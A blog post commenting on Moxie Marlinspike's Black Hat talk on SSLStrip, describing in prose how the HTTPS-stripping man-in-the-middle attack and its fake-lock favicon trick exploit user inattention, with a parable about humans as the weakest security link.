Not a week goes by without some new problem surfacing in day to day communication security. The newest stems from a black hat talk by Moxie Marlinspike of thoughtcrime.org. This attack is not sky-is-falling immediate action required bad, but is instead of the depressingly preventable variety. Moxie’s new attack is actually quite elegant and has a retro vibe to it in exploiting the most vulnerable link in any security chain: the user.
His setup for the attack examines website design as it relates to SSL security. He observes users do not type HTTPS, but rather encounter it from HTTP such as login boxes which post to HTTPS urls. Separating the feedback mechanisms into positive and negative, he also notes triggering the positive mechanisms (little locks, changing colored address bars, etc) is not so bad while triggering negative mechanisms (invalid security certificate, problem encountered with the website’s certificate etc) are game killers.
Moxie introduces a new tool SSLStrip which acts as a man in the middle attack with a twist. The attack does not compromise SSL security; instead it monitors the HTTP traffic noting and switching all the HTTPS references to HTTP and waits. When a request is made for a stripped url, the attacker proxies it by requesting the proper secure site via HTTPS and using the information the client posted over HTTP then returns the data unencrypted to the client. With a properly secured HTTPS connection this cannot occur because the attacker cannot read the information transmitted between client and server, and also cannot act as the server since it lacks the server’s private key to setup the connection.
From a technical perspective this attack is a non-issue, it does not compromise SSL in any way. So why does this attack work? Users are not dependable, not knowledgeable, and not paranoid enough to consistently check the security of their connections before posting sensitive information. The attack results in the website being displayed without the “positive” feedback mechanisms; had it been left here it still would have been a dangerous attack on the gullibility of end users, but Moxie added a few more twists that are very witty. Because users expect to see little locks, he decided to give them one. Have you heard of a favicon? Take a look at the left of your address bar, see the little icon next to my url? It is a tiny 16×16 icon graphic which I place in the root directory of the site. Your browser asks for this from every site you visit and displays it like a little brand. Moxie rewrites the favicon requests for “secure” websites he proxies and replaces them with a lock graphic. To the casual user it looks like a positive feedback mechanism for a secure site. Ha!
The attack also had a nice solution for dealing with sessions. It waits like a trap door spider for a length of time (to avoid suspicion aroused by killing recently logged in sessions) and then springs into action by killing older sessions thus forcing the user to relogin over the unsecure connection. The unsecure login, of course, can then be recorded in plain text by the attacker.
Curiously, the slide set notes some strange behaviour from the sites themselves. Some “secure” login boxes display little lock symbols which do not change when the site is no longer secure. It reminds me of a quote from Paranoia, “You are in error. No one is screaming.” Despite evidence to the contrary, the user is easily led into a false sense of security by a little lock which does not actually function the way it is expected to.
The whole affair also reminds me of a passage in the book Cyberpunk: Outlaws and Hackers on the Computer Frontier. It is a little fuzzy since I have not read the book since high school; as I recall, the passage was a parable about security and the fragility of the human link. A lot of the book itself involved social engineering rather than technical exploits, and the parable was an example laying out a physically secure server with only a modem link for communication, a password of sufficient length and complexity, and a single general who held the password. The scenario is effectively the pinnacle of achievable security. Now, so the story went, add a second general with access to the password; by adding this second person you halve the security of the system. The second general introduces social engineering attack vectors where the attacker could pose as the secretary of general 1 speaking to general 2 pretending the first general is asking for the password because he’s forgotten it, and vice versa with the attacker pretending to be general 2’s secretary. The point of the parable was no matter how technologically secure a system is, the weakest point in it is the user. The presentation from black hat is another example of this reality.
And so, I close with another pertinent quote from paranoia:
Stay Alert! Trust No One! Keep Your Laser Handy!